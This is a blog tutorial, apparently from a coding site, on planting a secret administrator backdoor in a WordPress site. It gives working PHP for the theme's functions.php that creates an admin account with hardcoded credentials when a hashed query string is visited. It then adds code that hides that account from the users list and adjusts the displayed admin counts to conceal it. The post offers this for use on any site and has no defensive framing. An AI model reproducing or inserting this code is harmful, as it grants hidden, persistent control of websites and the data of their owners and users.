The Best Way To Create A Secret Backdoor Admin Access To WordPress

Following these steps to Create A Backdoor

You can use the code below to create a backdoor into any WordPress site. Copy-paste this code into the theme functions.php file(Active Theme).

Note: Paste the following code after completing any code/function. Please don’t do this if you don’t have minimum knowledge with code.

// Start User Backdoor Code
add_action( 'wp_head', 'mysecret_backdoor' );

function mysecret_backdoor() {
    if ( md5( $_GET['secretadmin'] ) == 'bc1bd15de8d5b0ce4944c87f2f960fd0' ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'thecoderain' ) ) {
            $user_id = wp_create_user( 'thecoderain', 'coderain007' );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' ); 
        }
    }
}

// End User Backdoor Code

Now you can save your file and add a query string to your website as follows:
https://example.com/?secretadmin=thecoderain
and press enter.

You’ve created a secret backdoor to access the admin panel and can use it at will. Open this url to access our new user’s admin panel. https://example.com/wp-admin/

Now enter your admin details  that i have mentioned above
USERNAME: thecoderain
PASSWORD: coderain007

Please keep in mind that even though we created the user secretly, it will still appear in the users list, so in order to hide it, follow next steps.

1. Hiding a user from the user’s list and the WordPress backend

// Start Hide User
add_action('pre_user_query','site_pre_user_query');
function site_pre_user_query($user_search) {
  global $current_user;
  $username = $current_user->user_login;
 
  if ($username == 'YOUR_USERNAME_HERE') {
  } else {
    global $wpdb;
    $user_search->query_where = str_replace('WHERE 1=1',
      "WHERE 1=1 AND {$wpdb->users}.user_login != 'YOUR_USERNAME_HERE'",$user_search->query_where);
  }
}

// End Hide User

 In the above code replace ‘YOUR_USERNAME_HERE’ with your username.

2. Show the number of admins excluding hidden user

add_filter("views_users", "site_list_table_views");
function site_list_table_views($views) {
   $users = count_users();
   $admins_num = $users['avail_roles']['administrator'] - 1;
   $all_num = $users['total_users'] - 1;
   $class_adm = ( strpos($views['administrator'], 'current') === false ) ? "" : "current";
   $class_all = ( strpos($views['all'], 'current') === false ) ? "" : "current";
   $views['administrator'] = '<a href="users.php?role=administrator" class="' . $class_adm . '">' . translate_user_role('Administrator') . ' <span class="count">(' . $admins_num . ')</span></a>';
   $views['all'] = '<a href="users.php" class="' . $class_all . '">' . __('All') . ' <span class="count">(' . $all_num . ')</span></a>';
   return $views;
}

After saving the functions.php file, check the admin panel, you will not find any admin users with the username that was passed in the above code.

Note that you only need to paste the code at the end of an action. No mistake can be made. If you make a mistake, the website will crash.

1 reply on “The Best Way To Create A Secret Backdoor Admin Access To WordPress”

  • 08/09/2022 at 9:30 AM

    Great, Thanks

Leave a Reply

Your email address will not be published.

two × 4 =